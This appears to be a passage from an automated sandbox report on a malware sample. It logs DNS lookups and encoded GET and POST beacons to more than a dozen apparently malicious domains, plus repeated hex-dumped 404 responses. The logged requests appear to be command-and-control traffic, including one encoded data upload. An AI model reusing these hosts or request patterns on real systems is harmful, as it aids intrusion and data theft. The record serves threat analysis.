            Source: global trafficHTTP traffic detected: GET /wqu9/?Ux_TPFo=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.yu35n.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC+k3iYjthOPfxR3hOlb9i/x9FbCM9gWjU2jH2bxpk27YwwYDjrUExqEoirVxd+JcnloOoNZ40tu8bNN8NKiaeO1oTtxon0OItavvmTQbTg==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.52ywq.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ypa3/?Ux_TPFo=EtvbmXebZ+kERMHYn1m9SdOeKiFdq52bRf+Bnrg8mYDc8XPjIo/GtaNN4S1/Ry5wyE5veib2sb/FYFZZwx3N4jsKRZfkwZ7IXAzk/wTFocSMyqJij72Vua102dz6GHAwJQ==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hvm1/?FvypB=88kTDXb8k4dH&Ux_TPFo=AgKb8DW05IXx47rDIxe6k/I3elmL24Z8KJzJt46ewrw8hV7koCZq3nWDxRNTdr9dPMkLNwozkBBgf0Q4+Yfq/718ZCTBXcvSkJlRrZQnUmqO5QjtzKFYlQ011ieRBpIGng== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.timetime.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /we8s/?Ux_TPFo=B/Ffkm4qUuUCWdnVEpVwdmrdDijaPZ3A0fpocgttxQoV3YOc442YbZNzMMcWNYt4UT21tvDjHwm/MpeUUta83tC+u6YvkHEIW8iJ6mTYaCCmbzx0dOXTePBC5wD5mbl0jA==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.agilizeimob.appConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.asstl.online
            Source: global trafficDNS traffic detected: DNS query: www.cc101.pro
            Source: global trafficDNS traffic detected: DNS query: www.popin.space
            Source: global trafficDNS traffic detected: DNS query: www.suarahati20.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dhkatp.vip
            Source: global trafficDNS traffic detected: DNS query: www.eslameldaramlly.site
            Source: global trafficDNS traffic detected: DNS query: www.pofgof.pro
            Source: global trafficDNS traffic detected: DNS query: www.donante-de-ovulos.biz
            Source: global trafficDNS traffic detected: DNS query: www.airtech365.net
            Source: global trafficDNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
            Source: global trafficDNS traffic detected: DNS query: www.yu35n.top
            Source: global trafficDNS traffic detected: DNS query: www.52ywq.vip
            Source: global trafficDNS traffic detected: DNS query: www.komart.shop
            Source: global trafficDNS traffic detected: DNS query: www.timetime.store
            Source: global trafficDNS traffic detected: DNS query: www.agilizeimob.app
            Source: unknownHTTP traffic detected: POST /x7gz/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.popin.spaceOrigin: http://www.popin.spaceReferer: http://www.popin.space/x7gz/Content-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36Data Raw: 55 78 5f 54 50 46 6f 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 74 79 50 63 32 30 6f 6c 39 4c 68 52 2f 58 30 30 66 46 6d 38 42 67 7a 36 56 57 61 7a 7a 69 2b 4a 6f 63 41 59 4e 76 79 73 77 4e 4e 67 74 34 67 77 44 79 52 5a 4c 6c 76 67 37 33 70 35 38 6b 6a 75 63 68 57 6a 63 49 35 58 61 41 72 55 44 59 77 74 42 58 31 6d 45 63 42 78 4e 53 59 6c 33 79 36 66 68 4a 68 63 78 6e 7a 66 5a 72 62 31 6f 5a 44 30 51 50 50 62 48 4b 34 49 51 48 59 46 78 63 39 47 6d 32 71 44 6b 45 30 33 52 71 48 57 36 6e 4f 61 44 51 43 72 68 75 52 58 68 78 6b 74 44 54 67 77 48 77 39 6d 77 37 43 30 4b 34 6f 4d 4b 73 72 47 62 76 71 59 79 69 62 37 65 58 77 3d Data Ascii: Ux_TPFo=f07BeQ/6F/4ytyPc20ol9LhR/X00fFm8Bgz6VWazzi+JocAYNvyswNNgt4gwDyRZLlvg73p58kjuchWjcI5XaArUDYwtBX1mEcBxNSYl3y6fhJhcxnzfZrb1oZD0QPPbHK4IQHYFxc9Gm2qDkE03RqHW6nOaDQCrhuRXhxktDTgwHw9mw7C0K4oMKsrGbvqYyib7eXw=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 07:16:30 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 07:16:32 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 07:16:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 07:16:37 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 25 Sep 2024 07:16:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 25 Sep 2024 07:16:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 